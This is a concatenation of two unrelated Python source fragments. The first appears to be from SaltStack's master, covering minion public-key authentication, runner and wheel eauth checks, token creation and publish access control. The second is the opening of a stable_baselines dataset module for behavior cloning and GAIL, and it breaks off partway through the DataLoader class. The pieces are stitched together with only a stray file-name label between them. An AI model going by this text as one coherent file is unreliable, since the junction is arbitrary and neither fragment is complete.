pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
pubfn_pend = os.path.join(self.opts['pki_dir'],
'minions_pre',
load['id'])
pubfn_rejected = os.path.join(self.opts['pki_dir'],
'minions_rejected',
load['id'])
pubfn_denied = os.path.join(self.opts['pki_dir'],
'minions_denied',
load['id'])
if self.opts['open_mode']:
# open mode is turned on, nuts to checks and overwrite whatever
# is there
pass
elif os.path.isfile(pubfn_rejected):
# The key has been rejected, don't place it in pending
log.info('Public key rejected for {id}'.format(**load))
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
elif os.path.isfile(pubfn):
# The key has been accepted, check it
if salt.utils.fopen(pubfn, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys did not match. This may be an attempt to compromise '
'the Salt cluster.'.format(**load)
)
# put denied minion key into minions_denied
with salt.utils.fopen(pubfn_denied, 'w+') as fp_:
fp_.write(load['pub'])
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
elif not os.path.isfile(pubfn_pend):
# The key has not been accepted, this is a new minion
if os.path.isdir(pubfn_pend):
# The key path is a directory, error out
log.info(
'New public key {id} is a directory'.format(**load)
)
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
if auto_reject:
key_path = pubfn_rejected
log.info('New public key for {id} rejected via autoreject_file'
.format(**load))
key_act = 'reject'
key_result = False
elif not auto_sign:
key_path = pubfn_pend
log.info('New public key for {id} placed in pending'
.format(**load))
key_act = 'pend'
key_result = True
else:
# The key is being automatically accepted, don't do anything
# here and let the auto accept logic below handle it.
key_path = None
if key_path is not None:
# Write the key to the appropriate location
with salt.utils.fopen(key_path, 'w+') as fp_:
fp_.write(load['pub'])
ret = {'enc': 'clear',
'load': {'ret': key_result}}
eload = {'result': key_result,
'act': key_act,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return ret
elif os.path.isfile(pubfn_pend):
# This key is in the pending dir and is awaiting acceptance
if auto_reject:
# We don't care if the keys match, this minion is being
# auto-rejected. Move the key file from the pending dir to the
# rejected dir.
try:
shutil.move(pubfn_pend, pubfn_rejected)
except (IOError, OSError):
pass
log.info('Pending public key for {id} rejected via '
'autoreject_file'.format(**load))
ret = {'enc': 'clear',
'load': {'ret': False}}
eload = {'result': False,
'act': 'reject',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return ret
elif not auto_sign:
# This key is in the pending dir and is not being auto-signed.
# Check if the keys are the same and error out if this is the
# case. Otherwise log the fact that the minion is still
# pending.
if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'key in pending did not match. This may be an '
'attempt to compromise the Salt cluster.'
.format(**load)
)
# put denied minion key into minions_denied
with salt.utils.fopen(pubfn_denied, 'w+') as fp_:
fp_.write(load['pub'])
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
else:
log.info(
'Authentication failed from host {id}, the key is in '
'pending and needs to be accepted with salt-key '
'-a {id}'.format(**load)
)
eload = {'result': True,
'act': 'pend',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': True}}
else:
# This key is in pending and has been configured to be
# auto-signed. Check to see if it is the same key, and if
# so, pass on doing anything here, and let it get automatically
# accepted below.
if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
log.error(
'Authentication attempt from {id} failed, the public '
'keys in pending did not match. This may be an '
'attempt to compromise the Salt cluster.'
.format(**load)
)
# put denied minion key into minions_denied
with salt.utils.fopen(pubfn_denied, 'w+') as fp_:
fp_.write(load['pub'])
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
else:
pass
else:
# Something happened that I have not accounted for, FAIL!
log.warn('Unaccounted for authentication failure')
eload = {'result': False,
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return {'enc': 'clear',
'load': {'ret': False}}
log.info('Authentication accepted from {id}'.format(**load))
# only write to disk if you are adding the file, and in open mode,
# which implies we accept any key from a minion (key needs to be
# written every time because what's on disk is used for encrypting)
if not os.path.isfile(pubfn) or self.opts['open_mode']:
with salt.utils.fopen(pubfn, 'w+') as fp_:
fp_.write(load['pub'])
pub = None
# The key payload may sometimes be corrupt when using auto-accept
# and an empty request comes in
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError as err:
log.error('Corrupt public key "{0}": {1}'.format(pubfn, err))
return {'enc': 'clear',
'load': {'ret': False}}
ret = {'enc': 'pub',
'pub_key': self.master_key.get_pub_str(),
'publish_port': self.opts['publish_port']}
# sign the masters pubkey (if enabled) before it is
# send to the minion that was just authenticated
if self.opts['master_sign_pubkey']:
# append the pre-computed signature to the auth-reply
if self.master_key.pubkey_signature():
log.debug('Adding pubkey signature to auth-reply')
log.debug(self.master_key.pubkey_signature())
ret.update({'pub_sig': self.master_key.pubkey_signature()})
else:
# the master has its own signing-keypair, compute the master.pub's
# signature and append that to the auth-reply
log.debug("Signing master public key before sending")
pub_sign = salt.crypt.sign_message(self.master_key.get_sign_paths()[1],
ret['pub_key'])
ret.update({'pub_sig': binascii.b2a_base64(pub_sign)})
if self.opts['auth_mode'] >= 2:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(load['token'], 4)
aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
else:
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(aes, 4)
else:
if 'token' in load:
try:
mtoken = self.master_key.key.private_decrypt(
load['token'], 4
)
ret['token'] = pub.public_encrypt(mtoken, 4)
except Exception:
# Token failed to decrypt, send back the salty bacon to
# support older minions
pass
aes = self.opts['aes']
ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
# Be aggressive about the signature
digest = hashlib.sha256(aes).hexdigest()
ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
eload = {'result': True,
'act': 'accept',
'id': load['id'],
'pub': load['pub']}
self.event.fire_event(eload, tagify(prefix='auth'))
return ret
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
if 'token' in clear_load:
try:
token = self.loadauth.get_tok(clear_load['token'])
except Exception as exc:
msg = 'Exception occurred when generating auth token: {0}'.format(
exc)
log.error(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if not token:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['eauth'] not in self.opts['external_auth']:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['name'] not in self.opts['external_auth'][token['eauth']]:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
good = self.ckminions.runner_check(
self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "token" occurred for '
'user {0}.').format(token['name'])
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(
fun,
clear_load.get('kwarg', {}),
token['name'])
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
if 'eauth' not in clear_load:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
try:
name = self.loadauth.load_name(clear_load)
if not (name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']]):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if not self.loadauth.time_auth(clear_load):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
good = self.ckminions.runner_check(
self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][clear_load['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(fun,
clear_load.get('kwarg', {}),
clear_load.get('username', 'UNKNOWN'))
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
except Exception as exc:
log.error(
'Exception occurred in the runner system: {0}'.format(exc)
)
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
if 'token' in clear_load:
try:
token = self.loadauth.get_tok(clear_load['token'])
except Exception as exc:
msg = 'Exception occurred when generating auth token: {0}'.format(
exc)
log.error(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if not token:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['eauth'] not in self.opts['external_auth']:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
if token['name'] not in self.opts['external_auth'][token['eauth']]:
msg = 'Authentication failure of type "token" occurred.'
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
good = self.ckminions.wheel_check(
self.opts['external_auth'][token['eauth']][token['name']]
if token['name'] in self.opts['external_auth'][token['eauth']]
else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "token" occurred for '
'user {0}.').format(token['name'])
log.warning(msg)
return dict(error=dict(name='TokenAuthenticationError',
message=msg))
jid = salt.utils.gen_jid()
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': token['name']}
try:
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, **clear_load)
data['return'] = ret
data['success'] = True
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error(exc)
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
if 'eauth' not in clear_load:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) |
('*' in self.opts['external_auth'][clear_load['eauth']])):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
if not self.loadauth.time_auth(clear_load):
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
good = self.ckminions.wheel_check(
self.opts['external_auth'][clear_load['eauth']][name]
if name in self.opts['external_auth'][clear_load['eauth']]
else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'])
if not good:
msg = ('Authentication failure of type "eauth" occurred for '
'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
log.warning(msg)
return dict(error=dict(name='EauthAuthenticationError',
message=msg))
jid = salt.utils.gen_jid()
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': clear_load.get('username', 'UNKNOWN')}
try:
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, **clear_load)
data['return'] = ret
data['success'] = True
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while '
'introspecting {0}: {1}'.format(fun, exc))
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error(
'Exception occurred in the wheel system: {0}'.format(exc)
)
return dict(error=dict(name=exc.__class__.__name__,
args=exc.args,
message=exc.message))
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
if 'eauth' not in clear_load:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
if clear_load['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
log.warning('Authentication failure of type "eauth" occurred.')
return ''
try:
name = self.loadauth.load_name(clear_load)
if not ((name in self.opts['external_auth'][clear_load['eauth']]) |
('*' in self.opts['external_auth'][clear_load['eauth']])):
log.warning('Authentication failure of type "eauth" occurred.')
return ''
if not self.loadauth.time_auth(clear_load):
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return self.loadauth.mk_token(clear_load)
except Exception as exc:
log.error(
'Exception occurred while authenticating: {0}'.format(exc)
)
return ''
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
# check blacklist/whitelist
good = True
# Check if the user is blacklisted
for user_re in self.opts['client_acl_blacklist'].get('users', []):
if re.match(user_re, clear_load['user']):
good = False
break
# check if the cmd is blacklisted
for module_re in self.opts['client_acl_blacklist'].get('modules', []):
# if this is a regular command, its a single function
if type(clear_load['fun']) == str:
funs_to_check = [clear_load['fun']]
# if this a compound function
else:
funs_to_check = clear_load['fun']
for fun in funs_to_check:
if re.match(module_re, fun):
good = False
break
if good is False:
log.error(
'{user} does not have permissions to run {function}. Please '
'contact your local administrator if you believe this is in '
'error.\n'.format(
user=clear_load['user'],
function=clear_load['fun']
)
)
return ''
# to make sure we don't step on anyone else's toes
del good
# Check for external auth calls
if extra.get('token', False):
# A token was passed, check it
try:
token = self.loadauth.get_tok(extra['token'])
except Exception as exc:
log.error(
'Exception occurred when generating auth token: {0}'.format(
exc
)
)
return ''
if not token:
log.warning('Authentication failure of type "token" occurred.')
return ''
if token['eauth'] not in self.opts['external_auth']:
log.warning('Authentication failure of type "token" occurred.')
return ''
if not ((token['name'] in self.opts['external_auth'][token['eauth']]) |
('*' in self.opts['external_auth'][token['eauth']])):
log.warning('Authentication failure of type "token" occurred.')
return ''
good = self.ckminions.auth_check(
self.opts['external_auth'][token['eauth']][token['name']]
if token['name'] in self.opts['external_auth'][token['eauth']]
else self.opts['external_auth'][token['eauth']]['*'],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "token" occurred.'
)
return ''
clear_load['user'] = token['name']
log.debug('Minion tokenized user = "{0}"'.format(clear_load['user']))
elif 'eauth' in extra:
if extra['eauth'] not in self.opts['external_auth']:
# The eauth system is not enabled, fail
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
try:
name = self.loadauth.load_name(extra) # The username we are attempting to auth with
groups = self.loadauth.get_groups(extra) # The groups this user belongs to
group_perm_keys = filter(lambda(item): item.endswith('%'), self.opts['external_auth'][extra['eauth']]) # The configured auth groups
# First we need to know if the user is allowed to proceed via any of their group memberships.
group_auth_match = False
for group_config in group_perm_keys:
group_config = group_config.rstrip('%')
for group in groups:
if group == group_config:
group_auth_match = True
# If a group_auth_match is set it means only that we have a user which matches at least one or more
# of the groups defined in the configuration file.
# If neither a catchall, a named membership or a group membership is found, there is no need
# to continue. Simply deny the user access.
if not ((name in self.opts['external_auth'][extra['eauth']]) |
('*' in self.opts['external_auth'][extra['eauth']]) |
group_auth_match):
# A group def is defined and the user is a member
#[group for groups in ['external_auth'][extra['eauth']]]):
# Auth successful, but no matching user found in config
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
# Perform the actual authentication. If we fail here, do not continue.
if not self.loadauth.time_auth(extra):
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
except Exception as exc:
log.error(
'Exception occurred while authenticating: {0}'.format(exc)
)
return ''
# auth_list = self.opts['external_auth'][extra['eauth']][name] if name in self.opts['external_auth'][extra['eauth']] else self.opts['external_auth'][extra['eauth']]['*']
# We now have an authenticated session and it is time to determine
# what the user has access to.
auth_list = []
if name in self.opts['external_auth'][extra['eauth']]:
auth_list = self.opts['external_auth'][extra['eauth']][name]
if group_auth_match:
auth_list.append(self.ckminions.gather_groups(self.opts['external_auth'][extra['eauth']], groups, auth_list))
good = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob')
)
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "eauth" occurred.'
)
return ''
clear_load['user'] = name
# Verify that the caller has root on master
elif 'user' in clear_load:
if clear_load['user'].startswith('sudo_'):
# If someone can sudo, allow them to act as root
if clear_load.get('key', 'invalid') == self.key.get('root'):
clear_load.pop('key')
elif clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == self.opts.get('user', 'root'):
if clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == 'root':
if clear_load.pop('key') != self.key.get(self.opts.get('user', 'root')):
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
elif clear_load['user'] == salt.utils.get_user():
if clear_load.pop('key') != self.key.get(clear_load['user']):
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
else:
if clear_load['user'] in self.key:
# User is authorised, check key and check perms
if clear_load.pop('key') != self.key[clear_load['user']]:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
if clear_load['user'] not in self.opts['client_acl']:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
good = self.ckminions.auth_check(
self.opts['client_acl'][clear_load['user']],
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
# Accept find_job so the CLI will function cleanly
if clear_load['fun'] != 'saltutil.find_job':
log.warning(
'Authentication failure of type "user" '
'occurred.'
)
return ''
else:
log.warning(
'Authentication failure of type "user" occurred.'
)
return ''
else:
if clear_load.pop('key') != self.key[salt.utils.get_user()]:
log.warning(
'Authentication failure of type "other" occurred.'
)
return ''
# Retrieve the minions list
minions = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob')
)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions
}
}
# Retrieve the jid
if not clear_load['jid']:
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
clear_load['jid'] = self.mminion.returners[fstr](nocache=extra.get('nocache', False))
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, 'new_job') # old dup event
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
log.critical(
'The specified returner used for the external job cache '
'"{0}" does not have a save_load function!'.format(
self.opts['ext_job_cache']
)
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"{0}" does not have a save_load function!'.format(
self.opts['master_job_cache']
)
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'user' in clear_load:
log.info(
'User {user} Published command {fun} with jid {jid}'.format(
**clear_load
)
)
load['user'] = clear_load['user']
else:
log.info(
'Published command {fun} with jid {jid}'.format(
**clear_load
)
)
log.debug('Published command details {0}'.format(load))
payload['load'] = self.crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
pub_sock.send(self.serial.dumps(int_payload))
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions
}
}
|
dataset.py
|
import queue
import time
from multiprocessing import Queue, Process
import cv2
import numpy as np
from joblib import Parallel, delayed
from stable_baselines import logger
class ExpertDataset(object):
"""
Dataset for using behavior cloning or GAIL.
The structure of the expert dataset is a dict, saved as an ".npz" archive.
The dictionary contains the keys 'actions', 'episode_returns', 'rewards', 'obs' and 'episode_starts'.
The corresponding values have data concatenated across episode: the first axis is the timestep,
the remaining axes index into the data. In case of images, 'obs' contains the relative path to
the images, to enable space saving from image compression.
:param expert_path: (str) The path to trajectory data (.npz file). Mutually exclusive with traj_data.
:param traj_data: (dict) Trajectory data, in format described above. Mutually exclusive with expert_path.
:param train_fraction: (float) the train validation split (0 to 1)
for pre-training using behavior cloning (BC)
:param batch_size: (int) the minibatch size for behavior cloning
:param traj_limitation: (int) the number of trajectory to use (if -1, load all)
:param randomize: (bool) if the dataset should be shuffled
:param verbose: (int) Verbosity
:param sequential_preprocessing: (bool) Do not use subprocess to preprocess
the data (slower but use less memory for the CI)
"""
def __init__(self, expert_path=None, traj_data=None, train_fraction=0.7, batch_size=64,
traj_limitation=-1, randomize=True, verbose=1, sequential_preprocessing=False, special_shape=None):
if traj_data is not None and expert_path is not None:
raise ValueError("Cannot specify both 'traj_data' and 'expert_path'")
if traj_data is None and expert_path is None:
raise ValueError("Must specify one of 'traj_data' or 'expert_path'")
if traj_data is None:
traj_data = np.load(expert_path, allow_pickle=True)
if verbose > 0:
for key, val in traj_data.items():
print(key, val.shape)
# Array of bool where episode_starts[i] = True for each new episode
episode_starts = traj_data['episode_starts']
traj_limit_idx = len(traj_data['obs'])
if traj_limitation > 0:
n_episodes = 0
# Retrieve the index corresponding
# to the traj_limitation trajectory
for idx, episode_start in enumerate(episode_starts):
n_episodes += int(episode_start)
if n_episodes == (traj_limitation + 1):
traj_limit_idx = idx - 1
observations = traj_data['obs'][:traj_limit_idx]
actions = traj_data['actions'][:traj_limit_idx]
# obs, actions: shape (N * L, ) + S
# where N = # episodes, L = episode length
# and S is the environment observation/action space.
# S = (1, ) for discrete space
# Flatten to (N * L, prod(S))
if not special_shape:
if len(observations.shape) > 2:
observations = np.reshape(observations, [-1, np.prod(observations.shape[1:])])
if len(actions.shape) > 2:
actions = np.reshape(actions, [-1, np.prod(actions.shape[1:])])
indices = np.random.permutation(len(observations)).astype(np.int64)
# Train/Validation split when using behavior cloning
train_indices = indices[:int(train_fraction * len(indices))]
val_indices = indices[int(train_fraction * len(indices)):]
assert len(train_indices) > 0, "No sample for the training set"
assert len(val_indices) > 0, "No sample for the validation set"
self.observations = observations
self.actions = actions
self.returns = traj_data['episode_returns'][:traj_limit_idx]
self.avg_ret = sum(self.returns) / len(self.returns)
self.std_ret = np.std(np.array(self.returns))
self.verbose = verbose
assert len(self.observations) == len(self.actions), "The number of actions and observations differ " \
"please check your expert dataset"
self.num_traj = min(traj_limitation, np.sum(episode_starts))
self.num_transition = len(self.observations)
self.randomize = randomize
self.sequential_preprocessing = sequential_preprocessing
self.dataloader = None
self.train_loader = DataLoader(train_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
self.val_loader = DataLoader(val_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
if self.verbose >= 1:
self.log_info()
def init_dataloader(self, batch_size):
"""
Initialize the dataloader used by GAIL.
:param batch_size: (int)
"""
indices = np.random.permutation(len(self.observations)).astype(np.int64)
self.dataloader = DataLoader(indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=self.sequential_preprocessing)
def __del__(self):
del self.dataloader, self.train_loader, self.val_loader
def prepare_pickling(self):
"""
Exit processes in order to pickle the dataset.
"""
self.dataloader, self.train_loader, self.val_loader = None, None, None
def log_info(self):
"""
Log the information of the dataset.
"""
logger.log("Total trajectories: {}".format(self.num_traj))
logger.log("Total transitions: {}".format(self.num_transition))
logger.log("Average returns: {}".format(self.avg_ret))
logger.log("Std for returns: {}".format(self.std_ret))
def get_next_batch(self, split=None):
"""
Get the batch from the dataset.
:param split: (str) the type of data split (can be None, 'train', 'val')
:return: (np.ndarray, np.ndarray) inputs and labels
"""
dataloader = {
None: self.dataloader,
'train': self.train_loader,
'val': self.val_loader
}[split]
if dataloader.process is None:
dataloader.start_process()
try:
return next(dataloader)
except StopIteration:
dataloader = iter(dataloader)
return next(dataloader)
def plot(self):
"""
Show histogram plotting of the episode returns
"""
# Isolate dependency since it is only used for plotting and also since
# different matplotlib backends have further dependencies themselves.
import matplotlib.pyplot as plt
plt.hist(self.returns)
plt.show()
class DataLoader(object):
"""
A custom dataloader to preprocessing observations (including images)
and feed them to the network.
Original code for the dataloader from https://github.com/araffin/robotics-rl-srl
(MIT licence)
Authors: Antonin Raffin, René Traoré, Ashley Hill
:param indices: ([int]) list of observations indices
:param observations: (np.ndarray) observations or images path
:param actions: (np.ndarray) actions
:param batch_size: (int) Number of samples per minibatch
:param n_workers: (int) number of preprocessing worker (for loading the images)
:param infinite_loop: (bool) whether to have an iterator that can be resetted
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param shuffle: (bool) Shuffle the minibatch after each epoch
:param start_process: (bool) Start the preprocessing process (default: True)
:param backend: (str) joblib backend (one of 'multiprocessing', 'sequential', 'threading'
or 'loky' in newest versions)
:param sequential: (bool) Do not use subprocess to preprocess the data
(slower but use less memory for the CI)
:param partial_minibatch: (bool) Allow partial minibatches (minibatches with a number of element
lesser than the batch_size)
"""
def __init__(self, indices, observations, actions, batch_size, n_workers=1,
infinite_loop=True, max_queue_len=1, shuffle=False,
start_process=True, backend='threading', sequential=False, partial_minibatch=True):
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.indices = indices
self.original_indices = indices.copy()
self.n_minibatches = len(indices) // batch_size
# Add a partial minibatch, for instance
# when there is not enough samples
if partial_minibatch and len(indices) / batch_size > 0:
self.n_minibatches += 1
